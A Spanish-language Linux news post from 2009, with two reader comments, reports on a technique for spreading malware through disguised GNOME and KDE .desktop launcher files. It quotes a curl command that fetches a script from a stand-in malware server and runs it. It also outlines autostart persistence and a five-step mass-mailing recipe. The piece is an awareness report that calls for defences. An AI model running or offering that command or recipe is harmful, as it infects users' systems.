Sondeo

Si ya probaste GNOME 3...

¿Te gustó GNOME 3?

  •  Si
  •  No
Este sondeo tiene 5 preguntas más.
Resultados
Más sondeos | 2,312 votos | 8 comentarios
Atención: 21 al 25 de mayo, Curso Global de Servidores con CentOS 6.
Atención: 23 al 27 de abril, Curso SUSE Linux Enterprise Desktop Administration.
Atención: 21 y 28 de abril, 5 y 12 de mayo, Taller de programación de Python.
Atención: Disponible ALDOS 1.4.3. Nuestro sistema operativo para escritorio.
Seguridad.

Amenazas de virus para GNOME y KDE.

Joel Barrios Dueñas, 17/02/2009, 15:14. 1,113 lecturas.
foobar publicó recientemente en su bitácora personal un artículo titulado Cómo escribir un virus para Linux en 5 segundos, detallando la infección con equipamiento lógico maligno (malware) a través del formato de los archivos .desktop que utilizan GNOME y KDE. Aunque esto está lejos de ser una nueva amenaza, es un riesgo potencial, como fue discutido en 2006, que a la fecha carece de una solución para lidiar con el problema.

Linux Weekly News está discutiendo de manera amplia el problema, que de cierta manera permite a un atacante disfrazar un archivo .desktop con el icono de Inicio o cualquier programa. Básicamente el artículo de foobar sugiere explotar la confianza que tiene los usuarios de GNU/Linux en el sistemas, pero sin subestimarlos, utilizando archivos .desktop que se disfrazan con iconos de otras aplicaciones, y que ejecutan guiones remotos, como el siguiente ejemplo:

% bash -c "curl http://www.some_malware_server.org/s.py -o /tmp/s.py; python /tmp/s.py"

El artículo también sugiere utilizar ~/.config/autostart y ~/.kde/Autostart para asegurarse que el guión se ejecute automáticamente en cada inicio de sesión.

La guía resumida, sugiere lo siguiente:

  1. Escribir un código a la elección del atacante.
  2. Implementar en éste último la capacidad de instalarse e iniciarse a si mismo.
  3. Crear un archivo lanzador de escritorio para ejecutar el código.
  4. Adjuntar el código a un correo electrónico.
  5. Enviar el correo electrónico a cuantas direcciones de correo se pueda.

Todo esto ha puesto en alerta a muchos desarrolladores, que ahora comienzan a pensar y preocuparse de las medidas a utilizar. Este es posiblemente una buena excusa para volver a reactivar SELinux en los escritorios donde fue desactivado para mejorar rendimiento, y comenzar a pensar como implementar un antivirus del mismo modo que se hace en Windows, solo por sanidad mental. En fin, los desarrolladores han vuelto a tocar el tema, y es casi seguro que se hará algo al respecto en el futuro cercano (la menos eso esperamos).

Fuente: Slashdot.

Atención: Salvo que se indique lo contrario, la licencia del texto de este documento es Creative Commons Reconocimiento 2.5, mediante la cual usted tiene permitido copiar, modificar, comunicar y distribuir el contenido de este texto, de manera total o parcial, y publicarlo o difundirlo en cualquier otro sitio de Internet o medio de comunicaciòn, siempre y cuando incluya o cite (1)el nombre de este sitio de Internet, (2)enlace permanente de este documento, (3)nombre del autor y (4)la misma licencia de distribución.

Opciones: Imprimir | Recomendar | Enlace permanente

Twitter Facebook Google Bookmarks Bitacoras.com Wikio Menéame Technorati Bloglines Digg Yahoo Buzz
 
Seguimientos (Trackback)
URL de seguimiento para esta entrada: http://www.alcancelibre.org/trackback.php/amenazas-de-virus-para-gnome-y-kde
Sin comentarios de seguimientos para esta entrada.
 
Amenazas de virus para GNOME y KDE. | 2 comentarios | Crea cuenta nueva
Los siguientes comentarios son de la persona que los haya enviado. Este sitio se deslinda de cualquier responsabilidad respecto de las opiniones expresadas por los participantes en nuestros foros y secciones de comentarios, y el hecho de publicar las mismas no significa que se esté de acuerdo con éstas.
Amenazas de virus para GNOME y KDE.
Escrito por: William Lpz Jimnz (KoalaSoft) el 17/02/2009, 17:37
Virus ?? -.. en gnome y KDE ?? ...

Vaya .. este tipo de cosas me dan alergia saber que hay personas sin nada que hacer de provecho y se dedican solo a hacer este tipo de cosas ..

cual es la *inche envidia que le tiene a linux de que no haya linux, en que le beneficia hacer este tipo de cosas, por que ? no se ... solo este tipo de personas con pensamientos de "mira jaja soy bueno cree un virus en linux" .. que  no le vasta saber que hay miles de virus para windows ... hello !!!



* mil disculpa por la expresión ..

---
.:: Cuando el Alumno esta listo, el maestro aparece ::.
[[http://www.koalasoftmx.net ::BLog::]]

[ # ]
Amenazas de virus para GNOME y KDE.
Escrito por: Gerardo Juarez el 17/02/2009, 20:42
La diferencia aqui es que la vulnerabilidad se conoce publicamente. El codigo esta abierto para que cualquiera que pueda verlo y sugerir una correccion.
[ # ]